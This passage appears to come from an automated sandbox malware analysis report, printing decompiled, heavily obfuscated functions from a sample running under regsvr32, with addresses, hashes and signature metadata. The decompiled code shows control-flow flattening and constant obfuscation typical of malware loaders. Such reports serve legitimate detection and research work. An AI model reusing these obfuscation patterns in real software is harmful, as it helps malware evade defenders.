				_v8 = _v8 ^ 0x00061860;
				_v36 = 0xe6d903;
				_t181 = 0x7c;
				_v36 = _v36 / _t181;
				_v36 = _v36 << 0xc;
				_t180 = 0;
				_v36 = _v36 ^ 0x1dc12f6e;
				_v12 = 0xb8ae20;
				_v12 = _v12 + 0x7b7e;
				_v12 = _v12 ^ 0x00bd9a64;
				_v56 = 0x84804;
				_v56 = _v56 + 0x7031;
				_v56 = _v56 | 0xe692f604;
				_v56 = _v56 + 0xffff5b47;
				_v56 = _v56 ^ 0xe69aca73;
				_v60 = 0x9ddf11;
				_v60 = _v60 >> 2;
				_v60 = _v60 + 0x7ae4;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x0003d98e;
				_v64 = 0xe1d87e;
				_v64 = _v64 + 0xffff85be;
				_t182 = 6;
				_v64 = _v64 * 0x53;
				_v64 = _v64 + 0xffffcf2c;
				_v64 = _v64 ^ 0x4912d591;
				_v40 = 0x8395;
				_v40 = _v40 / _t182;
				_t183 = 0x1c;
				_v40 = _v40 / _t183;
				_v40 = _v40 ^ 0x000bd098;
				_v20 = 0x601bf4;
				_v20 = _v20 + 0xffff5c57;
				_v20 = _v20 ^ 0x005874f6;
				_v44 = 0x32a705;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 | 0xfb5bd821;
				_v44 = _v44 ^ 0xfb51fe60;
				_v48 = 0xf7548a;
				_v48 = _v48 + 0xffff745d;
				_v48 = _v48 + 0xffffbe17;
				_v48 = _v48 ^ 0x00f473c3;
				_v24 = 0xb2b47c;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x0004f45f;
				_v4 = 0x5dc847;
				_v4 = _v4 ^ 0xb2d3419d;
				_v4 = _v4 ^ 0xb280c8f7;
				_v28 = 0xeea17b;
				_v28 = _v28 + 0x2ec6;
				_v28 = _v28 << 0xc;
				_v28 = _v28 ^ 0xed0bc3f7;
				_v32 = 0x568491;
				_v32 = _v32 | 0x57c08082;
				_v32 = _v32 << 0xb;
				_t145 = 0x684e69a;
				_v32 = _v32 ^ 0xb426afc9;
				_t184 = _v4;
				_t187 = _v4;
				_t152 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					L2:
					while(1) {
						do {
							while(_t153 != 0x636b8db) {
								if(_t153 == 0x6541371) {
									_t153 = 0xc380f79;
									continue;
								} else {
									if(_t153 == _t145) {
										E001C267C(_v40, _v20, _t187);
										_t180 =  !=  ? 1 : _t180;
										_t153 = 0xaa11ecd;
										goto L18;
									} else {
										if(_t153 == 0xaa11ecd) {
											E001BED7B(_t187, _v44, _v48, _v24);
											_t153 = 0xf9ca69f;
											L18:
											_t175 = 0x5c;
											goto L16;
										} else {
											if(_t153 == 0xc380f79) {
												_t185 =  *0x1c4c10; // 0x67d820
												_t186 = _t185 + 0x20c;
												while( *_t186 != _t175) {
													_t186 = _t186 + 2;
												}
												_t184 = _t186 + 2;
												_t153 = 0x636b8db;
												L16:
												_t145 = 0x684e69a;
												continue;
											} else {
												if(_t153 == 0xf50c6f0) {
													_t187 = E001A8E38(_v52, _v56, _v60, _v64, _t184, _t152);
													_t188 =  &(_t188[4]);
													_t145 = 0x684e69a;
													_t153 =  !=  ? 0x684e69a : 0xf9ca69f;
													goto L1;
												} else {
													if(_t153 != 0xf9ca69f) {
														goto L24;
													} else {
														E001BED7B(_t152, _v4, _v28, _v32);
													}
												}
											}
										}
									}
								}
								L10:
								return _t180;
							}
							_push(_t153);
							_t146 = E001A6E01(_v8, _v36, _t153, _v12, _v16);
							_t152 = _t146;
							_t188 =  &(_t188[4]);
							if(_t146 == 0) {
								_t153 = 0x9f415a2;
								_t145 = 0x684e69a;
								_t175 = 0x5c;
								goto L24;
							} else {
								_t153 = 0xf50c6f0;
								goto L18;
							}
							goto L10;
							L24:
						} while (_t153 != 0x9f415a2);
						goto L10;
					}
				}
			}
































                                                                                                                0x001bd15e
                                                                                                                0x001bd161
                                                                                                                0x001bd16b
                                                                                                                0x001bd170
                                                                                                                0x001bd175
                                                                                                                0x001bd17d
                                                                                                                0x001bd185
                                                                                                                0x001bd18d
                                                                                                                0x001bd195
                                                                                                                0x001bd19d
                                                                                                                0x001bd1a5
                                                                                                                0x001bd1aa
                                                                                                                0x001bd1b2
                                                                                                                0x001bd1c4
                                                                                                                0x001bd1c9
                                                                                                                0x001bd1cf
                                                                                                                0x001bd1d4
                                                                                                                0x001bd1d6
                                                                                                                0x001bd1de
                                                                                                                0x001bd1e6
                                                                                                                0x001bd1ee
                                                                                                                0x001bd1f6
                                                                                                                0x001bd1fe
                                                                                                                0x001bd206
                                                                                                                0x001bd20e
                                                                                                                0x001bd216
                                                                                                                0x001bd21e
                                                                                                                0x001bd226
                                                                                                                0x001bd22b
                                                                                                                0x001bd233
                                                                                                                0x001bd238
                                                                                                                0x001bd240
                                                                                                                0x001bd248
                                                                                                                0x001bd255
                                                                                                                0x001bd258
                                                                                                                0x001bd25c
                                                                                                                0x001bd264
                                                                                                                0x001bd26c
                                                                                                                0x001bd27c
                                                                                                                0x001bd284
                                                                                                                0x001bd287
                                                                                                                0x001bd28b
                                                                                                                0x001bd293
                                                                                                                0x001bd29b
                                                                                                                0x001bd2a3
                                                                                                                0x001bd2ab
                                                                                                                0x001bd2b3
                                                                                                                0x001bd2b8
                                                                                                                0x001bd2c0
                                                                                                                0x001bd2c8
                                                                                                                0x001bd2d0
                                                                                                                0x001bd2d8
                                                                                                                0x001bd2e0
                                                                                                                0x001bd2e8
                                                                                                                0x001bd2f0
                                                                                                                0x001bd2f5
                                                                                                                0x001bd2fd
                                                                                                                0x001bd305
                                                                                                                0x001bd30d
                                                                                                                0x001bd315
                                                                                                                0x001bd31d
                                                                                                                0x001bd325
                                                                                                                0x001bd32a
                                                                                                                0x001bd332
                                                                                                                0x001bd33a
                                                                                                                0x001bd342
                                                                                                                0x001bd347
                                                                                                                0x001bd34c
                                                                                                                0x001bd354
                                                                                                                0x001bd358
                                                                                                                0x001bd35c
                                                                                                                0x001bd360
                                                                                                                0x001bd360
                                                                                                                0x001bd360
                                                                                                                0x00000000
                                                                                                                0x001bd363
                                                                                                                0x001bd363
                                                                                                                0x001bd363
                                                                                                                0x001bd375
                                                                                                                0x001bd45f
                                                                                                                0x00000000
                                                                                                                0x001bd37b
                                                                                                                0x001bd37d
                                                                                                                0x001bd44a
                                                                                                                0x001bd455
                                                                                                                0x001bd458
                                                                                                                0x00000000
                                                                                                                0x001bd383
                                                                                                                0x001bd389
                                                                                                                0x001bd430
                                                                                                                0x001bd437
                                                                                                                0x001bd43c
                                                                                                                0x001bd43e
                                                                                                                0x00000000
                                                                                                                0x001bd38f
                                                                                                                0x001bd395
                                                                                                                0x001bd3fa
                                                                                                                0x001bd400
                                                                                                                0x001bd40b
                                                                                                                0x001bd408
                                                                                                                0x001bd408
                                                                                                                0x001bd410
                                                                                                                0x001bd413
                                                                                                                0x001bd418
                                                                                                                0x001bd418
                                                                                                                0x00000000
                                                                                                                0x001bd397
                                                                                                                0x001bd39d
                                                                                                                0x001bd3e1
                                                                                                                0x001bd3e3
                                                                                                                0x001bd3ed
                                                                                                                0x001bd3f2
                                                                                                                0x00000000
                                                                                                                0x001bd39f
                                                                                                                0x001bd3a5
                                                                                                                0x00000000
                                                                                                                0x001bd3ab
                                                                                                                0x001bd3b9
                                                                                                                0x001bd3bf
                                                                                                                0x001bd3a5
                                                                                                                0x001bd39d
                                                                                                                0x001bd395
                                                                                                                0x001bd389
                                                                                                                0x001bd37d
                                                                                                                0x001bd3c0
                                                                                                                0x001bd3c9
                                                                                                                0x001bd3c9
                                                                                                                0x001bd469
                                                                                                                0x001bd47b
                                                                                                                0x001bd480
                                                                                                                0x001bd482
                                                                                                                0x001bd487
                                                                                                                0x001bd492
                                                                                                                0x001bd497
                                                                                                                0x001bd49c
                                                                                                                0x00000000
                                                                                                                0x001bd489
                                                                                                                0x001bd489
                                                                                                                0x00000000
                                                                                                                0x001bd489
                                                                                                                0x00000000
                                                                                                                0x001bd49d
                                                                                                                0x001bd49d
                                                                                                                0x00000000
                                                                                                                0x001bd4a9
                                                                                                                0x001bd363

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: 1p$~{$z
                                                                                                                • API String ID: 3098006287-2708623661
                                                                                                                • Opcode ID: f3b1646ddc478806277d52348ada3ab7511457a59d6b63d20b50241831ff3f49
                                                                                                                • Instruction ID: 7bf6f4ee3d3c3d2cd50269873744816a591b0ea399fdb163bce95e254608126f
                                                                                                                • Opcode Fuzzy Hash: f3b1646ddc478806277d52348ada3ab7511457a59d6b63d20b50241831ff3f49
                                                                                                                • Instruction Fuzzy Hash: 0D81A57160C341EFC3989E25E48946FBBE1FBD4768F50990CF686562A0D7B48949CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7730 Relevance: 3.9, Strings: 3, Instructions: 182COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E001B7730(void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v60;
				void* _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				unsigned int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* __ecx;
				void* _t143;
				signed int _t167;
				void* _t171;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int* _t203;

				_t169 = _a12;
				_t200 = _a4;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t200);
				E001AC98A(_t143);
				_v76 = 0xe5e0b1;
				_t203 =  &(( &_v132)[6]);
				asm("stosd");
				_t171 = 0xc2327b9;
				asm("stosd");
				asm("stosd");
				_v100 = 0x78754;
				_v100 = _v100 + 0x65f5;
				_t195 = 0x11;
				_v100 = _v100 / _t195;
				_v100 = _v100 ^ 0x0000775e;
				_v104 = 0xfa64b;
				_v104 = _v104 ^ 0x05233608;
				_v104 = _v104 | 0x34374dc2;
				_v104 = _v104 ^ 0x353bdbae;
				_v108 = 0x7e03f7;
				_v108 = _v108 | 0x20e2d8fc;
				_v108 = _v108 >> 4;
				_v108 = _v108 ^ 0x0205491c;
				_v88 = 0xf3147f;
				_v88 = _v88 + 0xd080;
				_v88 = _v88 ^ 0x00fc182d;
				_v112 = 0xf6f5;
				_v112 = _v112 | 0xffc34e17;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 ^ 0x0008fd98;
				_v116 = 0x23a146;
				_t196 = 0x30;
				_v116 = _v116 / _t196;
				_v116 = _v116 ^ 0x6a671653;
				_v116 = _v116 ^ 0x6a6eb115;
				_v120 = 0x83fe4c;
				_v120 = _v120 | 0xffeb99f5;
				_v120 = _v120 ^ 0xffe0b241;
				_v124 = 0x7d772d;
				_v124 = _v124 << 0xc;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0xb40d4b58;
				_v92 = 0x7f407e;
				_v92 = _v92 ^ 0x6429eac1;
				_v92 = _v92 + 0x9092;
				_v92 = _v92 ^ 0x6459c238;
				_v96 = 0xd49d75;
				_v96 = _v96 + 0xffffe1bf;
				_v96 = _v96 << 6;
				_v96 = _v96 ^ 0x3518097b;
				_v84 = 0xb18f80;
				_v84 = _v84 ^ 0x1e094a98;
				_v84 = _v84 ^ 0x1eb6a275;
				_v132 = 0x2555a9;
				_t197 = 0x53;
				_v132 = _v132 / _t197;
				_v132 = _v132 * 0x47;
				_v132 = _v132 ^ 0x22c2d3db;
				_v132 = _v132 ^ 0x22d478f7;
				_v128 = 0x7a38ed;
				_v128 = _v128 ^ 0xe3f771e1;
				_v128 = _v128 ^ 0x4e12562a;
				_t198 = 0x7a;
				_v128 = _v128 / _t198;
				_v128 = _v128 ^ 0x0163ade5;
				_v80 = 0xa35609;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x028d2dcd;
				do {
					while(_t171 != 0x2edcc5e) {
						if(_t171 == 0x63db5b2) {
							_t200[1] = E001C23B9(_t169);
							_t171 = 0xf538816;
							continue;
						} else {
							if(_t171 == 0xc2327b9) {
								_t171 = 0x63db5b2;
								 *_t200 =  *_t200 & 0x00000000;
								_t200[1] = _v100;
								continue;
							} else {
								if(_t171 == 0xce4ec78) {
									E001A4E8F(_t169 + 0xc,  &_v60, __eflags, _v128, _v80);
								} else {
									if(_t171 == 0xdc4b8cf) {
										E001A4E8F(_t169 + 0x14,  &_v60, __eflags, _v84, _v132);
										_t171 = 0xce4ec78;
										continue;
									} else {
										if(_t171 == 0xf538816) {
											_push(_t171);
											_t167 = E001A303A(_t171, _t200[1]);
											_t203 =  &(_t203[3]);
											 *_t200 = _t167;
											__eflags = _t167;
											if(__eflags != 0) {
												_t171 = 0xfdfde07;
												continue;
											}
										} else {
											if(_t171 != 0xfdfde07) {
												goto L15;
											} else {
												E001A6DD9( &_v60, _v116, _v120, _t200, _v124);
												_t203 =  &(_t203[3]);
												_t171 = 0x2edcc5e;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						__eflags =  *_t200;
						_t142 =  *_t200 != 0;
						__eflags = _t142;
						return 0 | _t142;
					}
					E001AE4D8(_v92,  *((intOrPtr*)(_t169 + 0x38)),  &_v60, _v96);
					_t203 =  &(_t203[2]);
					_t171 = 0xdc4b8cf;
					L15:
					__eflags = _t171 - 0x8aadd9b;
				} while (__eflags != 0);
				goto L18;
			}






























                                                                                                                0x001b7737
                                                                                                                0x001b7740
                                                                                                                0x001b7748
                                                                                                                0x001b774f
                                                                                                                0x001b7750
                                                                                                                0x001b7757
                                                                                                                0x001b775a
                                                                                                                0x001b775f
                                                                                                                0x001b776d
                                                                                                                0x001b7770
                                                                                                                0x001b7773
                                                                                                                0x001b777a
                                                                                                                0x001b777b
                                                                                                                0x001b777c
                                                                                                                0x001b7784
                                                                                                                0x001b7790
                                                                                                                0x001b7795
                                                                                                                0x001b779b
                                                                                                                0x001b77a3
                                                                                                                0x001b77ab
                                                                                                                0x001b77b3
                                                                                                                0x001b77bb
                                                                                                                0x001b77c3
                                                                                                                0x001b77cb
                                                                                                                0x001b77d3
                                                                                                                0x001b77d8
                                                                                                                0x001b77e0
                                                                                                                0x001b77e8
                                                                                                                0x001b77f0
                                                                                                                0x001b77f8
                                                                                                                0x001b7800
                                                                                                                0x001b7808
                                                                                                                0x001b780d
                                                                                                                0x001b7815
                                                                                                                0x001b7821
                                                                                                                0x001b7826
                                                                                                                0x001b782c
                                                                                                                0x001b7834
                                                                                                                0x001b783c
                                                                                                                0x001b7844
                                                                                                                0x001b784c
                                                                                                                0x001b7854
                                                                                                                0x001b785c
                                                                                                                0x001b7861
                                                                                                                0x001b7866
                                                                                                                0x001b786e
                                                                                                                0x001b7876
                                                                                                                0x001b787e
                                                                                                                0x001b7886
                                                                                                                0x001b788e
                                                                                                                0x001b7896
                                                                                                                0x001b789e
                                                                                                                0x001b78a3
                                                                                                                0x001b78ab
                                                                                                                0x001b78b3
                                                                                                                0x001b78bb
                                                                                                                0x001b78c3
                                                                                                                0x001b78cf
                                                                                                                0x001b78d2
                                                                                                                0x001b78db
                                                                                                                0x001b78df
                                                                                                                0x001b78e9
                                                                                                                0x001b78f6
                                                                                                                0x001b78fe
                                                                                                                0x001b7906
                                                                                                                0x001b7914
                                                                                                                0x001b791c
                                                                                                                0x001b7920
                                                                                                                0x001b7928
                                                                                                                0x001b7930
                                                                                                                0x001b7935
                                                                                                                0x001b793d
                                                                                                                0x001b793d
                                                                                                                0x001b794b
                                                                                                                0x001b7a07
                                                                                                                0x001b7a0a
                                                                                                                0x00000000
                                                                                                                0x001b7951
                                                                                                                0x001b7957
                                                                                                                0x001b79f3
                                                                                                                0x001b79f5
                                                                                                                0x001b79f8
                                                                                                                0x00000000
                                                                                                                0x001b795d
                                                                                                                0x001b7963
                                                                                                                0x001b7a4e
                                                                                                                0x001b7969
                                                                                                                0x001b796f
                                                                                                                0x001b79de
                                                                                                                0x001b79e5
                                                                                                                0x00000000
                                                                                                                0x001b7971
                                                                                                                0x001b7977
                                                                                                                0x001b79b1
                                                                                                                0x001b79b6
                                                                                                                0x001b79bb
                                                                                                                0x001b79be
                                                                                                                0x001b79c0
                                                                                                                0x001b79c2
                                                                                                                0x001b79c8
                                                                                                                0x00000000
                                                                                                                0x001b79c8
                                                                                                                0x001b7979
                                                                                                                0x001b797b
                                                                                                                0x00000000
                                                                                                                0x001b7981
                                                                                                                0x001b7992
                                                                                                                0x001b7997
                                                                                                                0x001b799a
                                                                                                                0x00000000
                                                                                                                0x001b799a
                                                                                                                0x001b797b
                                                                                                                0x001b7977
                                                                                                                0x001b796f
                                                                                                                0x001b7963
                                                                                                                0x001b7957
                                                                                                                0x001b7a55
                                                                                                                0x001b7a57
                                                                                                                0x001b7a5c
                                                                                                                0x001b7a5c
                                                                                                                0x001b7a66
                                                                                                                0x001b7a66
                                                                                                                0x001b7a24
                                                                                                                0x001b7a29
                                                                                                                0x001b7a2c
                                                                                                                0x001b7a31
                                                                                                                0x001b7a31
                                                                                                                0x001b7a31
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -w}$^w$8z
                                                                                                                • API String ID: 0-2264566183
                                                                                                                • Opcode ID: 70022e4a20332d3ef59d5ceec16eb0767f7e5c972c2db16544fb374251f58d0a
                                                                                                                • Instruction ID: e37531ab0be15cb11d50170af7cd344f74b343fb2d7e40286c48096f8bf8af50
                                                                                                                • Opcode Fuzzy Hash: 70022e4a20332d3ef59d5ceec16eb0767f7e5c972c2db16544fb374251f58d0a
                                                                                                                • Instruction Fuzzy Hash: 648162711083419FC758CF21C58A95FBBE2FBD8718F509A2DF29A96260D7B1CA09CB43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001ABB14 Relevance: 3.9, Strings: 3, Instructions: 149COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001ABB14(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v324;
				char _t162;
				signed int _t164;
				void* _t168;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				char* _t175;
				intOrPtr* _t196;
				void* _t197;
				void* _t198;

				_v52 = 0x72e1a8;
				_v52 = _v52 ^ 0x3f8d814a;
				_v52 = _v52 ^ 0x3ffa7e90;
				_v24 = 0x525d37;
				_v24 = _v24 + 0xffff16d8;
				_v24 = _v24 >> 5;
				_v24 = _v24 | 0xd85470c7;
				_v24 = _v24 ^ 0xd85f6910;
				_v44 = 0xa07c14;
				_t196 = __ecx;
				_t170 = 0x66;
				_v44 = _v44 / _t170;
				_v44 = _v44 | 0xfdf39f26;
				_v44 = _v44 ^ 0xfdf2f261;
				_v36 = 0x75744c;
				_v36 = _v36 ^ 0x9f328ce6;
				_v36 = _v36 + 0xcb73;
				_v36 = _v36 ^ 0x9f4fbdfc;
				_v8 = 0xc8d7be;
				_v8 = _v8 + 0xffffa177;
				_v8 = _v8 | 0x67decb06;
				_v8 = _v8 + 0xffffafa5;
				_v8 = _v8 ^ 0x67dea406;
				_v32 = 0x2fa657;
				_t171 = 0x4c;
				_v32 = _v32 / _t171;
				_t172 = 0x69;
				_v32 = _v32 / _t172;
				_v32 = _v32 ^ 0x000f9ffa;
				_v16 = 0x417b4e;
				_v16 = _v16 ^ 0xa7b59008;
				_v16 = _v16 ^ 0xcd843ba0;
				_v16 = _v16 + 0xffff502e;
				_v16 = _v16 ^ 0x6a7e2fb9;
				_v28 = 0xab023d;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0xee2e9c26;
				_t173 = 0x72;
				_v28 = _v28 / _t173;
				_v28 = _v28 ^ 0x021259e6;
				_v20 = 0x78f92f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 + 0xffff839a;
				_v20 = _v20 ^ 0xc7cb2a8d;
				_v12 = 0x23d721;
				_v12 = _v12 << 0xb;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xffffc88f;
				_v12 = _v12 ^ 0x003aac38;
				_v40 = 0xbb0f78;
				_v40 = _v40 + 0x2686;
				_v40 = _v40 ^ 0xba81bda0;
				_v40 = _v40 ^ 0xba39e082;
				_v60 = 0x69329d;
				_t174 = 0x74;
				_v60 = _v60 / _t174;
				_v60 = _v60 ^ 0x0008ef4d;
				_v56 = 0xbf8520;
				_t175 =  &_v324;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 ^ 0x4f4475cc;
				_v48 = 0xc99b79;
				_v48 = _v48 + 0xad3d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x019ceb7d;
				_v64 = 0x1fbae6;
				_v64 = _v64 * 0x21;
				_v64 = _v64 ^ 0x041c4917;
				while(1) {
					_t162 =  *_t196;
					if(_t162 == 0) {
						break;
					}
					if(_t162 == 0x2e) {
						 *_t175 = 0;
					} else {
						 *_t175 = _t162;
						_t175 = _t175 + 1;
						_t196 = _t196 + 1;
						continue;
					}
					L6:
					_t197 = E001BA5EB( &_v324, _v52, _v24, _v44);
					if(_t197 != 0) {
						L8:
						_t164 = E001B2FAB(_v28, _t196 + 1, _v20, _v12, _v40);
						_push(_v64);
						_push(_t197);
						_push(_v48);
						_push(_v56);
						return E001B66C8(_t164 ^ 0x1e6ea728, _v60);
					}
					_t168 = E001A31EA(_v36, _v8, _v32,  &_v324, _v16);
					_t197 = _t168;
					_t198 = _t198 + 0xc;
					if(_t197 != 0) {
						goto L8;
					}
					return _t168;
				}
				goto L6;
			}































                                                                                                                0x001abb1d
                                                                                                                0x001abb26
                                                                                                                0x001abb2d
                                                                                                                0x001abb34
                                                                                                                0x001abb3b
                                                                                                                0x001abb42
                                                                                                                0x001abb46
                                                                                                                0x001abb4d
                                                                                                                0x001abb54
                                                                                                                0x001abb62
                                                                                                                0x001abb64
                                                                                                                0x001abb69
                                                                                                                0x001abb6e
                                                                                                                0x001abb75
                                                                                                                0x001abb7c
                                                                                                                0x001abb83
                                                                                                                0x001abb8a
                                                                                                                0x001abb91
                                                                                                                0x001abb98
                                                                                                                0x001abb9f
                                                                                                                0x001abba6
                                                                                                                0x001abbad
                                                                                                                0x001abbb4
                                                                                                                0x001abbbb
                                                                                                                0x001abbc5
                                                                                                                0x001abbca
                                                                                                                0x001abbd2
                                                                                                                0x001abbd7
                                                                                                                0x001abbdc
                                                                                                                0x001abbe3
                                                                                                                0x001abbea
                                                                                                                0x001abbf1
                                                                                                                0x001abbf8
                                                                                                                0x001abbff
                                                                                                                0x001abc06
                                                                                                                0x001abc0d
                                                                                                                0x001abc11
                                                                                                                0x001abc1b
                                                                                                                0x001abc20
                                                                                                                0x001abc25
                                                                                                                0x001abc2c
                                                                                                                0x001abc33
                                                                                                                0x001abc37
                                                                                                                0x001abc44
                                                                                                                0x001abc4b
                                                                                                                0x001abc52
                                                                                                                0x001abc56
                                                                                                                0x001abc5a
                                                                                                                0x001abc61
                                                                                                                0x001abc68
                                                                                                                0x001abc6f
                                                                                                                0x001abc76
                                                                                                                0x001abc7d
                                                                                                                0x001abc84
                                                                                                                0x001abc8e
                                                                                                                0x001abc91
                                                                                                                0x001abc94
                                                                                                                0x001abc9b
                                                                                                                0x001abca2
                                                                                                                0x001abcac
                                                                                                                0x001abcaf
                                                                                                                0x001abcb6
                                                                                                                0x001abcbd
                                                                                                                0x001abcc4
                                                                                                                0x001abcc7
                                                                                                                0x001abcce
                                                                                                                0x001abcd9
                                                                                                                0x001abcdc
                                                                                                                0x001abced
                                                                                                                0x001abced
                                                                                                                0x001abcf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001abce7
                                                                                                                0x001abcf5
                                                                                                                0x001abce9
                                                                                                                0x001abce9
                                                                                                                0x001abceb
                                                                                                                0x001abcec
                                                                                                                0x00000000
                                                                                                                0x001abcec
                                                                                                                0x001abcf8
                                                                                                                0x001abd0c
                                                                                                                0x001abd12
                                                                                                                0x001abd35
                                                                                                                0x001abd44
                                                                                                                0x001abd49
                                                                                                                0x001abd51
                                                                                                                0x001abd52
                                                                                                                0x001abd57
                                                                                                                0x00000000
                                                                                                                0x001abd62
                                                                                                                0x001abd27
                                                                                                                0x001abd2c
                                                                                                                0x001abd2e
                                                                                                                0x001abd33
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001abd6a
                                                                                                                0x001abd6a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 7]R$Ltu$N{A
                                                                                                                • API String ID: 0-3184169258
                                                                                                                • Opcode ID: 22fa71c6b708005f2509732b31736f2ff453d5a187519ebed40b0efb6c44d4ca
                                                                                                                • Instruction ID: 4676cfc1833917da8fc203e995afec3adc2d3010a008a34d62db5e97f15a2793
                                                                                                                • Opcode Fuzzy Hash: 22fa71c6b708005f2509732b31736f2ff453d5a187519ebed40b0efb6c44d4ca
                                                                                                                • Instruction Fuzzy Hash: 7F613371C0521AEBDF08CFA5D98A5EEFBB2FF19314F208199E511B6260D7B51A05CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A7761 Relevance: 3.9, Strings: 3, Instructions: 142COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A7761() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t134;
				char* _t135;
				intOrPtr _t137;
				void* _t141;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				short* _t160;
				signed int* _t162;

				_t162 =  &_v568;
				_v532 = 0x24b94b;
				_v532 = _v532 ^ 0xff707e79;
				_t141 = 0xfbe1412;
				_v532 = _v532 << 0x10;
				_v532 = _v532 ^ 0xc737a5c5;
				_v564 = 0x5694a9;
				_v564 = _v564 * 0x6b;
				_t155 = 0x68;
				_v564 = _v564 / _t155;
				_t156 = 0x5f;
				_v564 = _v564 / _t156;
				_v564 = _v564 ^ 0x0001b3a6;
				_v540 = 0xc61020;
				_v540 = _v540 << 3;
				_v540 = _v540 << 0xf;
				_v540 = _v540 ^ 0x40864049;
				_v524 = 0xb004ec;
				_t157 = 0x1a;
				_v524 = _v524 * 0x11;
				_v524 = _v524 ^ 0x0bbc2398;
				_v560 = 0x5eaef3;
				_v560 = _v560 * 0x2d;
				_v560 = _v560 >> 7;
				_v560 = _v560 >> 6;
				_v560 = _v560 ^ 0x0004cf43;
				_v536 = 0x45b5c1;
				_v536 = _v536 / _t157;
				_v536 = _v536 >> 3;
				_v536 = _v536 ^ 0x000543c9;
				_v552 = 0x13dd03;
				_v552 = _v552 >> 0xb;
				_v552 = _v552 * 0x71;
				_v552 = _v552 ^ 0x00014bfe;
				_v556 = 0x67f268;
				_v556 = _v556 >> 0xc;
				_v556 = _v556 + 0xbb15;
				_v556 = _v556 * 0x42;
				_v556 = _v556 ^ 0x003812c0;
				_v544 = 0xc7662b;
				_v544 = _v544 >> 3;
				_v544 = _v544 + 0xf350;
				_v544 = _v544 ^ 0x0016dff5;
				_v528 = 0xab91fb;
				_v528 = _v528 ^ 0x3748161d;
				_v528 = _v528 ^ 0x37e5b25c;
				_v548 = 0x32613d;
				_v548 = _v548 << 8;
				_v548 = _v548 << 7;
				_v548 = _v548 ^ 0x30973ae5;
				do {
					while(_t141 != 0x6034e01) {
						if(_t141 == 0x6481137) {
							_t135 = E001C0575(_v532, _v564, __eflags, _t141,  &_v520, _v540);
